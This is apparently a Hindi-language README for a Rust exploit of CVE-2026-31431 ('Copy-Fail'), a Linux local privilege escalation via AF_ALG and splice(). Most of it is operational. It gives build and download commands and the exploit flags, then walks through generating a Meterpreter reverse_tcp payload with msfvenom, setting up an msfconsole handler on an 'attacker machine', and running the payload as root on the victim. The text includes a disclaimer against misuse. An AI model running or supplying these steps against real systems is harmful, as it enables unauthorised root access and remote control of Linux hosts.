
# CVE-2026-31431 के लिए Rust-आधारित स्थानीय विशेषाधिकार वृद्धि शोषण यह Linux सिस्टम पर Meterpreter जैसे कस्टम शेलकोड के निष्पादन को सक्षम बनाता है।
CVE-2026-31431 (Copy-Fail) के लिए एक Rust में लिखा गया लोकल प्रिविलेज एस्केलेशन एक्सप्लॉइट।
यह कस्टमाइज़्ड शेलकोड (जैसे Meterpreter) को निष्पादित करने की अनुमति देता है।
Xint ने CVE-2026-31431 का खुलासा किया, जो एक आर्बिट्रेरी पेज कैश राइट कमज़ोरी है जो AF_ALG और splice() को जोड़कर 4-बाइट राइट प्रिमिटिव प्राप्त करती है।
स्रोत: Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
यह प्रोजेक्ट साइबर सुरक्षा का अध्ययन करने में मेरी व्यक्तिगत रुचि के हिस्से के रूप में विकसित किया गया था। हालाँकि, इसका दुरुपयोग दुर्भावनापूर्ण उद्देश्यों के लिए संभावित रूप से किया जा सकता है।
कृपया इस टूल का उपयोग किसी भी अवैध गतिविधि के लिए न करें।
इस सॉफ़्टवेयर के किसी भी दुरुपयोग के लिए लेखक ज़िम्मेदार नहीं है।
नोट: मूल कार्य संपीड़ित/एन्कोडेड शेलकोड (जैसे,
/bin/sh) का उपयोग करता है। इस कार्यान्वयन में, मैंने इसे एक रॉ (असंपीड़ित)/bin/bashशेलकोड से बदल दिया है, जिससे इसे कस्टमाइज़ करना या उपयोगकर्ता-आपूर्ति किए गए पेलोड से सीधे बदलना आसान हो जाता है।
प्रोजेक्ट को क्लोन करें, फिर build.sh निष्पादित करें:
git clone [email protected]:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh
रिलीज़ पैकेज डाउनलोड करें और निकालें:
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86
बाइनरी नीचे दिए गए विकल्प प्रदान करते हैं:
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin
कमज़ोर मशीन पर:
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
Meterpreter पेलोड उत्पन्न करने के लिए नीचे दिए गए कमांड का उपयोग करें (PrependSetUid को True पर सेट करें):
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin
हमलावर मशीन (Kali Linux) पर:
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run
कमज़ोर मशीन पर:
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin